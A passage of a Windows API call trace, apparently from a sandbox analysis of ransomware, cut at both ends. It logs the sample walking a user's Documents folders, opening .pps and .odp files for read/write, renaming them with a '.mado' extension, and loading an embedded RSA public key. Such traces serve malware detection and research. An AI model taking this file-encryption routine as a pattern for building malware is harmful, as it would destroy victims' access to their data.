RRWNCvdbx\\dDSiV9mIqla-\\Ta4tu7_MhJ OhJavw.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fzpil8uu6qztlwowb\\f rrwncvdbx\\ddsiv9miqla-\\ta4tu7_mhj ohjavw.pps"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\F RRWNCvdbx\\dDSiV9mIqla-\\Ta4tu7_MhJ OhJavw.pps.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fzpil8uu6qztlwowb\\f rrwncvdbx\\ddsiv9miqla-\\ta4tu7_mhj ohjavw.pps.mado")) returned 1 [0206.343] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.343] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0206.343] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0206.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72b80 | out: hHeap=0x2c0000) returned 1 [0206.344] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbff157f0, ftCreationTime.dwHighDateTime=0x1d5d900, ftLastAccessTime.dwLowDateTime=0x3e43e0d0, ftLastAccessTime.dwHighDateTime=0x1d5e312, ftLastWriteTime.dwLowDateTime=0x3e43e0d0, ftLastWriteTime.dwHighDateTime=0x1d5e312, nFileSizeHigh=0x0, nFileSizeLow=0xaabf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Ta4tu7_MhJ OhJavw.pps", cAlternateFileName="TA4TU7~1.PPS")) returned 0 [0206.344] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0206.345] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0206.345] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77d00 | out: hHeap=0x2c0000) returned 1 [0206.345] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0206.345] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6360 [0206.345] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0206.345] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0206.345] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.345] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.345] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0206.345] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0206.345] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.345] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.345] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0206.345] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0206.345] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.345] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.345] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0206.345] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0206.345] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.345] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.345] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0206.345] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0206.345] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.345] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.345] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0206.345] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0206.345] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0206.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0206.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0206.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b7b950 [0206.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0206.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0206.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0206.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0206.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0206.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0206.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0206.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0206.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0206.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0206.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0206.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0206.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0206.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0206.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0206.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0206.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0206.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0206.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0206.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0206.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0206.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0206.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0206.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0206.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0206.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0206.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0206.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0206.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0206.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0206.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0206.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0206.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0206.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0206.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0206.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0206.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0206.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0206.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0206.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b7b950 [0206.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0206.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0206.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0206.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0206.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b7b950 [0206.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0206.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0206.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0206.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0206.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0206.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0206.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0206.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0206.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0206.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0206.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0206.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0206.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b7b950 [0206.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0206.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0206.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0206.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0206.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0206.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0206.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0206.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0206.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0206.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0206.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0206.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0206.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0206.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0206.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0206.351] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\F RRWNCvdbx\\vXUpqISFwbSAR3N1vI\\") returned="vXUpqISFwbSAR3N1vI\\" [0206.351] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\F RRWNCvdbx\\") returned="F RRWNCvdbx\\" [0206.351] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\") returned="fZpil8Uu6QzTlWoWB\\" [0206.351] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0206.351] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0206.351] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0206.351] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0206.351] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0206.351] PathFindFileNameW (pszPath="") returned="" [0206.351] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\F RRWNCvdbx\\vXUpqISFwbSAR3N1vI\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdb58950, ftCreationTime.dwHighDateTime=0x1d5e67b, ftLastAccessTime.dwLowDateTime=0xe384b8e0, ftLastAccessTime.dwHighDateTime=0x1d5d943, ftLastWriteTime.dwLowDateTime=0xe384b8e0, ftLastWriteTime.dwHighDateTime=0x1d5d943, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0206.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0206.353] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdb58950, ftCreationTime.dwHighDateTime=0x1d5e67b, ftLastAccessTime.dwLowDateTime=0xe384b8e0, ftLastAccessTime.dwHighDateTime=0x1d5d943, ftLastWriteTime.dwLowDateTime=0xe384b8e0, ftLastWriteTime.dwHighDateTime=0x1d5d943, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0206.353] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa235f50, ftCreationTime.dwHighDateTime=0x1d5e697, ftLastAccessTime.dwLowDateTime=0x5395bd00, ftLastAccessTime.dwHighDateTime=0x1d5e5d3, ftLastWriteTime.dwLowDateTime=0x5395bd00, ftLastWriteTime.dwHighDateTime=0x1d5e5d3, nFileSizeHigh=0x0, nFileSizeLow=0x12906, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IKLST5refT-CgW.odp", cAlternateFileName="IKLST5~1.ODP")) returned 1 [0206.353] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\F RRWNCvdbx\\vXUpqISFwbSAR3N1vI\\IKLST5refT-CgW.odp") returned=".odp" [0206.353] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\F RRWNCvdbx\\vXUpqISFwbSAR3N1vI\\IKLST5refT-CgW.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fzpil8uu6qztlwowb\\f rrwncvdbx\\vxupqisfwbsar3n1vi\\iklst5reft-cgw.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0206.354] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=76038) returned 1 [0206.354] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0206.356] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x128e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.356] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0206.357] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x12906, lpOverlapped=0x0) returned 1 [0206.358] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.358] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.358] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 